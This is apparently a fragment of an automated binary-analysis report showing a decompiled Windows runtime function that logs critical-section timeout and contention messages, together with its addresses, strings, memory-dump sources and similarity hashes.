                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 0464FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E0464FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E045FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04645720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04645720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                          0x0464fdda
                                                                                                                          0x0464fde2
                                                                                                                          0x0464fde5
                                                                                                                          0x0464fdec
                                                                                                                          0x0464fdfa
                                                                                                                          0x0464fdff
                                                                                                                          0x0464fe0a
                                                                                                                          0x0464fe0f
                                                                                                                          0x0464fe17
                                                                                                                          0x0464fe1e
                                                                                                                          0x0464fe19
                                                                                                                          0x0464fe19
                                                                                                                          0x0464fe19
                                                                                                                          0x0464fe20
                                                                                                                          0x0464fe21
                                                                                                                          0x0464fe22
                                                                                                                          0x0464fe25
                                                                                                                          0x0464fe40

                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0464FDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0464FE2B
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0464FE01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 4f0476b17ced9dc7fbe76d43eb65b7eb9d19a4ee5ffb3008ea8df35f3329f198
                                                                                                                          • Instruction ID: d74d8e27ba07acf6c73291cab72a674063ca3e04471a681d03fe050451d6cbb3
                                                                                                                          • Opcode Fuzzy Hash: 4f0476b17ced9dc7fbe76d43eb65b7eb9d19a4ee5ffb3008ea8df35f3329f198
                                                                                                                          • Instruction Fuzzy Hash: 45F0F632240201BFEB251A45DC02F63BF5AEB84730F140314F728566D1EA62F930D6F5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%